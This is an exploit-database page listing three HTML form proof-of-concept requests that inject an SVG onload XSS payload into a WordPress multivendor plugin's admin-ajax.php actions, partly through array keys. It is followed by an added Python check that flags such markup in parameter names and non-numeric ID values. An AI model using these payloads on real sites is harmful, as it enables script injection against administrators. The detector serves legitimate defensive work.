## https://sploitus.com/exploit?id=WPEX-ID:8F2A294A-220F-4D84-B8C0-7E3D15FCB015
With SitePress active, and with more than 1 active language:

<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=wcmp_product_translations" method="POST">
<input type="hidden" name="proid" value='"><svg/onload=alert(/XSS/)>'>
<input type="submit" name="Submit">
</form>
</body>
</html>

With 6458 being a valid product ID:
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=product_report_sort" method="POST">
<input type="hidden" name='total_sales_data["><svg/onload=alert(/XSS/)>][product_id]' value="6458"/>
<input type="submit" name="Submit" value="Submit">
</form>
</body>
</html>

With 16 being a valid vendor ID:
<html>
<body>
<form action="http://wp.lab/wordpress/wp-admin/admin-ajax.php?action=vendor_report_sort" method="POST">
<input type="hidden" name='total_sales_data["><svg/onload=alert(/XSS/)>][vendor_id]' value="16"/>
<input type="submit" name="Submit" value="Submit">
</form>
</body>
</html>
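
A defender-side check derived from the three requests above, added here as an example and not part of the original advisory or the plugin's code. It inspects parameter names as well as values, because two of the three requests carry the markup in the array key rather than in the value. The function name, the assumption that `proid`, `product_id` and `vendor_id` hold only digits, and the sample requests are constructed for illustration.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit

# AJAX actions named in the three requests on this page.
WATCHED_ACTIONS = {"wcmp_product_translations", "product_report_sort",
                   "vendor_report_sort"}
# Characters that have no place in an ID value or an array key.
MARKUP_CHARS = set("<>\"'")
# Assumption: these fields are numeric IDs (the page uses 6458 and 16).
ID_SUFFIXES = ("[product_id]", "[vendor_id]")


def suspicious_params(url, body):
    """Return [(where, param_name), ...] for one admin-ajax.php request.

    where is "name" when the parameter name carries markup characters,
    "value" when an ID field holds something other than digits.
    """
    query = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    fields = parse_qsl(body, keep_blank_values=True)
    # WordPress accepts the action from the query string or the body.
    action = query.get("action") or dict(fields).get("action")
    if action not in WATCHED_ACTIONS:
        return []
    findings = []
    for name, value in fields:
        if MARKUP_CHARS & set(name):
            findings.append(("name", name))
        if name == "proid" or name.endswith(ID_SUFFIXES):
            if not value.isdigit():
                findings.append(("value", name))
    return findings


# Constructed sample requests (harmless markup, not captured traffic).
AJAX = "https://example.com/wp-admin/admin-ajax.php?action="
SAMPLES = [
    (AJAX + "product_report_sort",
     urlencode({"total_sales_data[6458][product_id]": "6458"})),
    (AJAX + "product_report_sort",
     urlencode({'total_sales_data["><i>x</i>][product_id]': "6458"})),
    (AJAX + "wcmp_product_translations",
     urlencode({"proid": '"><i>x</i>'})),
    (AJAX + "heartbeat", urlencode({"data": "<b>"})),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url.rsplit("=", 1)[1], suspicious_params(url, body))
```

A filter that only looks at parameter values passes the second sample, which is why the name check runs for every field.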